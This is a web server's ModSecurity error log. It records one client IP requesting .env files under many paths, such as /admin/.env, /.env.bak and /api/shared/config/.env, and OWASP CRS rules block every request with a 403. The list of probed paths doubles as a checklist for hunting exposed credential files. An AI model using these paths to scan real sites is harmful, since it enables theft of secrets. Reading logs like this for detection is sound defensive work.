[Sun Dec 07 06:15:14.922995 2025] [:error] [pid 575099] [client 195.178.110.108:33866] [client 195.178.110.108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /main/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/main/.env"] [unique_id "aTUNYuplfNiR5IsYA3LJswAAAAk"]
[Sun Dec 07 06:15:14.923224 2025] [:error] [pid 575099] [client 195.178.110.108:33866] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/main/.env"] [unique_id "aTUNYuplfNiR5IsYA3LJswAAAAk"]
[Sun Dec 07 06:15:14.923395 2025] [:error] [pid 575099] [client 195.178.110.108:33866] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/main/.env"] [unique_id "aTUNYuplfNiR5IsYA3LJswAAAAk"]
[Sun Dec 07 06:15:15.125021 2025] [:error] [pid 573218] [client 195.178.110.108:33880] [client 195.178.110.108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node_modules/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/node_modules/.env"] [unique_id "aTUNY_-86ve6IRoVOdG0UAAAAAA"]
[Sun Dec 07 06:15:15.125248 2025] [:error] [pid 573218] [client 195.178.110.108:33880] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/node_modules/.env"] [unique_id "aTUNY_-86ve6IRoVOdG0UAAAAAA"]
[Sun Dec 07 06:15:15.125433 2025] [:error] [pid 573218] [client 195.178.110.108:33880] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/node_modules/.env"] [unique_id "aTUNY_-86ve6IRoVOdG0UAAAAAA"]
[Sun Dec 07 06:15:15.174708 2025] [:error] [pid 573218] [client 195.178.110.108:33880] [client 195.178.110.108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kyc/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/kyc/.env"] [unique_id "aTUNY_-86ve6IRoVOdG0UQAAAAA"]
[Sun Dec 07 06:15:15.174933 2025] [:error] [pid 573218] [client 195.178.110.108:33880] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/kyc/.env"] [unique_id "aTUNY_-86ve6IRoVOdG0UQAAAAA"]
[Sun Dec 07 06:15:15.175124 2025] [:error] [pid 573218] [client 195.178.110.108:33880] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/kyc/.env"] [unique_id "aTUNY_-86ve6IRoVOdG0UQAAAAA"]
[Sun Dec 07 06:15:15.355437 2025] [:error] [pid 575112] [client 195.178.110.108:33894] [client 195.178.110.108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aTUNY1IBBWS88v5sLMHbSgAAAA4"]
[Sun Dec 07 06:15:15.355676 2025] [:error] [pid 575112] [client 195.178.110.108:33894] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aTUNY1IBBWS88v5sLMHbSgAAAA4"]
[Sun Dec 07 06:15:15.355845 2025] [:error] [pid 575112] [client 195.178.110.108:33894] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aTUNY1IBBWS88v5sLMHbSgAAAA4"]
[Sun Dec 07 06:15:15.450540 2025] [:error] [pid 575112] [client 195.178.110.108:33894] [client 195.178.110.108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prod/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/prod/.env"] [unique_id "aTUNY1IBBWS88v5sLMHbSwAAAA4"]
[Sun Dec 07 06:15:15.450787 2025] [:error] [pid 575112] [client 195.178.110.108:33894] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/prod/.env"] [unique_id "aTUNY1IBBWS88v5sLMHbSwAAAA4"]
[Sun Dec 07 06:15:15.451023 2025] [:error] [pid 575112] [client 195.178.110.108:33894] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/prod/.env"] [unique_id "aTUNY1IBBWS88v5sLMHbSwAAAA4"]
[Sun Dec 07 06:15:15.530862 2025] [:error] [pid 575112] [client 195.178.110.108:33894] [client 195.178.110.108] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aTUNY1IBBWS88v5sLMHbTAAAAA4"]
[Sun Dec 07 06:15:15.531054 2025] [:error] [pid 575112] [client 195.178.110.108:33894] [client 195.178.110.108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aTUNY1IBBWS88v5sLMHbTAAAAA4"]
[Sun Dec 07 06:15:15.531366 2025] [:error] [pid 575112] [client 195.178.110.108:33894] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aTUNY1IBBWS88v5sLMHbTAAAAA4"]
[Sun Dec 07 06:15:15.531606 2025] [:error] [pid 575112] [client 195.178.110.108:33894] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aTUNY1IBBWS88v5sLMHbTAAAAA4"]
[Sun Dec 07 06:15:22.377786 2025] [:error] [pid 575098] [client 195.178.110.108:33916] [client 195.178.110.108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /website/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/website/.env"] [unique_id "aTUNasIyjLAtHsCAPK6j3gAAAAg"]
[Sun Dec 07 06:15:22.378047 2025] [:error] [pid 575098] [client 195.178.110.108:33916] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/website/.env"] [unique_id "aTUNasIyjLAtHsCAPK6j3gAAAAg"]
[Sun Dec 07 06:15:22.378213 2025] [:error] [pid 575098] [client 195.178.110.108:33916] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/website/.env"] [unique_id "aTUNasIyjLAtHsCAPK6j3gAAAAg"]
[Sun Dec 07 06:15:25.818148 2025] [:error] [pid 575822] [client 195.178.110.108:45766] [client 195.178.110.108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /website/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/website/.env"] [unique_id "aTUNbbHrKGegcZ_89jRaMwAAAAU"]
[Sun Dec 07 06:15:25.818450 2025] [:error] [pid 575822] [client 195.178.110.108:45766] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/website/.env"] [unique_id "aTUNbbHrKGegcZ_89jRaMwAAAAU"]
[Sun Dec 07 06:15:25.818661 2025] [:error] [pid 575822] [client 195.178.110.108:45766] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/website/.env"] [unique_id "aTUNbbHrKGegcZ_89jRaMwAAAAU"]
[Sun Dec 07 06:15:25.892661 2025] [:error] [pid 575822] [client 195.178.110.108:45766] [client 195.178.110.108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /development/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/development/.env"] [unique_id "aTUNbbHrKGegcZ_89jRaNAAAAAU"]
[Sun Dec 07 06:15:25.892892 2025] [:error] [pid 575822] [client 195.178.110.108:45766] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/development/.env"] [unique_id "aTUNbbHrKGegcZ_89jRaNAAAAAU"]
[Sun Dec 07 06:15:25.893082 2025] [:error] [pid 575822] [client 195.178.110.108:45766] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/development/.env"] [unique_id "aTUNbbHrKGegcZ_89jRaNAAAAAU"]
[Sun Dec 07 06:15:25.953349 2025] [:error] [pid 575822] [client 195.178.110.108:45766] [client 195.178.110.108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aTUNbbHrKGegcZ_89jRaNQAAAAU"]
[Sun Dec 07 06:15:25.953683 2025] [:error] [pid 575822] [client 195.178.110.108:45766] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aTUNbbHrKGegcZ_89jRaNQAAAAU"]
[Sun Dec 07 06:15:25.953951 2025] [:error] [pid 575822] [client 195.178.110.108:45766] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aTUNbbHrKGegcZ_89jRaNQAAAAU"]
[Sun Dec 07 06:15:26.019149 2025] [:error] [pid 575822] [client 195.178.110.108:45766] [client 195.178.110.108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/shared/config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/shared/config/.env"] [unique_id "aTUNbrHrKGegcZ_89jRaNgAAAAU"]
[Sun Dec 07 06:15:26.019402 2025] [:error] [pid 575822] [client 195.178.110.108:45766] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/shared/config/.env"] [unique_id "aTUNbrHrKGegcZ_89jRaNgAAAAU"]
[Sun Dec 07 06:15:26.019613 2025] [:error] [pid 575822] [client 195.178.110.108:45766] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/shared/config/.env"] [unique_id "aTUNbrHrKGegcZ_89jRaNgAAAAU"]
[Sun Dec 07 06:15:26.116173 2025] [:error] [pid 575822] [client 195.178.110.108:45766] [client 195.178.110.108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/shared/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/shared/.env"] [unique_id "aTUNbrHrKGegcZ_89jRaNwAAAAU"]
[Sun Dec 07 06:15:26.116399 2025] [:error] [pid 575822] [client 195.178.110.108:45766] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/shared/.env"] [unique_id "aTUNbrHrKGegcZ_89jRaNwAAAAU"]
[Sun Dec 07 06:15:26.116635 2025] [:error] [pid 575822] [client 195.178.110.108:45766] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/shared/.env"] [unique_id "aTUNbrHrKGegcZ_89jRaNwAAAAU"]
[Sun Dec 07 06:15:50.533326 2025] [:error] [pid 575091] [client 195.178.110.108:51494] [client 195.178.110.108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node/.env_example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/node/.env_example"] [unique_id "aTUNhhJQiyL0bOqNK0sWwQAAAAc"]
[Sun Dec 07 06:15:50.533579 2025] [:error] [pid 575091] [client 195.178.110.108:51494] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/node/.env_example"] [unique_id "aTUNhhJQiyL0bOqNK0sWwQAAAAc"]
[Sun Dec 07 06:15:50.533759 2025] [:error] [pid 575091] [client 195.178.110.108:51494] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/node/.env_example"] [unique_id "aTUNhhJQiyL0bOqNK0sWwQAAAAc"]
